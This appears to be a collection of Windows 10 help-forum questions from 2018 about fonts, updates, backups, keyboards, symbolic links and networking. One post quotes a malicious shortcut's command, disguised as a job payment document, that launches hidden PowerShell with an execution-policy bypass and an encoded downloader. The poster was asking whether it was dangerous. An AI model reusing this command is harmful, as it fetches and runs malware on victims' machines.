So is there a fix for ugly/jarred/pixelated fonts in Win10 yet?

    Posted: 28 Aug 2018 03:12 PM PDT

Just did a fresh install of latest win10 with a new GPU, and right away I noticed this damn ugly font that happens on many Win10 machines and I can't fix it.

It basically looks like cleartype is off, but it's on. Like there is no anti-aliasing on the font. It's not for all text, but good example is the windows 10 settings.

    Example: https://www.dropbox.com/s/rl6k30xqyvi4zgx/DPIproblm.PNG?raw=1

    Another example by another redditor:

    Thanks

    Yes GPU drivers are installed.

    Yes Cleartype is on.

Yes DPI is set to 100%

Display is set to 4:4:4 Full RGB

Finding .htm but not .html files

    Posted: 28 Aug 2018 09:59 AM PDT

This is an interesting problem, I have one or more files with a .htm extension in a folder with hundreds of .html files. How can I find just the .htm files?

    I've tried things like:

    dir *.htm

    dir *.h??

    dir *.???

All those also find .html files, I suppose because the old DOS 8.3 file names end in .htm and dir also searches on that.

I also tried the Windows 10 search *.??? and *.h?? with no luck.

An update may or may not have bricked my Windows 10 installation???

    Posted: 28 Aug 2018 04:36 PM PDT

This "1803" update has been around since 4 months1 apparently, but around two days ago I ran into an issue where I was stuck on my manufacturer's boot screen after leaving the computer unattended for about 6 hours (It must have been trying to update), and it would take me a couple boots until I was met with a "Critical System Failure" BSOD that bricked my installation of windows 10. I immediately fresh installed via usb and had no issue after that, but I couldn't pinpoint the reason for the BSOD.

Today I noticed that Windows 10 attempted to install a feature update to Windows 10, version 1803, and may have subsequently failed after "Error 0x8007045a". Computer seems to be working normally right now. I'm assuming this forced update was what may have bricked my install the other day, but has anyone else had a similar experience? If the update really is an issue, are there any workarounds to avoiding/fixing the update altogether?

    Thank you.

Someone sent me a .lnk file containing this code. What is it ? Harmful?

    Posted: 27 Aug 2018 09:11 PM PDT

    Hey guys,

I was applying for a job and someone sent me a file that they described as a document for the payment agreement.

I didn't open it as it was a .lnk file in a ZIP file and I thought the employer was just stupid and sent the wrong thing. So I went in to investigate where the file was supposed to link to and that's the id had linked:

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Cmd /C POwerSHelL.EXE -eX byPaSs -W hiDDen -ec CQAgAAkAKAAgAAwACQBOAGUAVwAtAG8AQgBqAGUAQwB0AAkACQAJAFMAWQBzAHQARQBNAC4AbgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAAJACAACQApAC4ARABPAFcAbgBsAE8AYQBkAGY

How other backup software's function compare to the windows built in?

    Posted: 28 Aug 2018 09:45 AM PDT

I backed my Windows 10 Home computer using the built in backup software to my external hard drive. It created a folder in it called FileHistory and backed up all the data files to it as present in the drives. Now whenever I connect it backs up new files to it and keeps the old ones as is even if I delete them on my PC. This has resulted in my external hard disk getting filled up with files I do not need.

Since this is the first time I took a backup I am not sure if it is supposed to work like this or do I have other options. What happens something happens to my PC and I need to restore everything? This would be of no use since it does not have windows and my installed program files.

Are there any other alternatives? I looked around in this sub and found "Macrium Reflect" and "veeam agent" recommend a lot. How are they different from the windows one?

Cant get any keyboards to work?

    Posted: 28 Aug 2018 04:32 AM PDT

Hi, my laptop keyboard only works while booting, once in Windows it completely stops functioning. I tried plugging in a USB keyboard but these too only work during boot. All the keyboard drivers (both laptop & USB) have yellow triangle next to them, and when I try reinstall them I get "error code 19 Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged." Any ideas?

Fixed! Was a registry issue, don't really understand what but at least it works.

Do 'jumbo packets' automatically get enabled if it detects that switch is compatible?

Is windows smart enough to notice if the switch it's connected to supports jumbo packets, to also use jumbo packets with compatible devices?

Questions about Symbolic Links - Windows 10

    Posted: 28 Aug 2018 05:16 AM PDT

    Hi all,

I recently had to create a Symbolic Link from my C Drive to my D Drive so my SSD doesnt fill up so quickly whilst I have a 1TB HHD with nothing in it.

I was wondering what if I wish to move the Folder in which the link is pointed to in the D Drive?

More specifically, I want to 'clean up' my folders, and I don't like how the folder is just in the D Drive with a temporary name. If I put it into another folder, or renamed it, would the Symbolic Link update to the new name, or pick it up from the new place the folder is in?

TL;DR Does a Symbolic Link pick up the exact folder I originally chose, regardless if moved or renamed, or does it pick up what I told it to originally when creating the link which wouldnt exist If I altered the folder.

Apologies if this is confusing, I am not the best at trying to explain things.

Do I need to do anything special with Windows 10 before changing RAM?

    Posted: 28 Aug 2018 08:59 AM PDT

I haven't used Windows 10 but my understanding is its "Shut down" command performs hibernation by default for faster startup. Presumably the hibernated system image will not load if the machine memory configuration has changed. So if I'm to plunder some RAM from a Windows 10 computer, would the owner need to do anything special first to force a full shutdown instead of hibernation? What would they need to click on?

    Touchscreen causing keyboard inputs

    Posted: 28 Aug 2018 08:51 AM PDT

I have a Dell xps. I am trying to use a Dell pen with the touchscreen with Onenote. Almost every time I try to use the pen my laptop takes in an input from a combination of the ctrl, alt, and win keys. This keeps me from being able to use my pen and is annoying to see on the screen. Before I can continue using my laptop, I must restart it. Sometimes the inputs force me to force restart. Everything is updated. Is there some sort of touchscreen input that is suppose to tell windows to take the ctrl, atl, or win keys? If so how to I keep the touchscreen from doing this? Thanks.

Preventing Windows from automatically changing networks?

    Posted: 28 Aug 2018 01:25 AM PDT

So my Windows 8.1 Laptop picked up a new weird habit of randomly connecting to other open networks even though the current one is completely working fine. And it's driving me insane. Imagine you got a work call from somebody across the world through Skype and your Laptop keeps connecting other non-functional networks and you lose connection in middle of the conversation. It's constantly doing this and I haven't been able to find a permanent solution. I also can't "Forget this network" them because it doesn't do anything on them when I left click. How can I fix this?
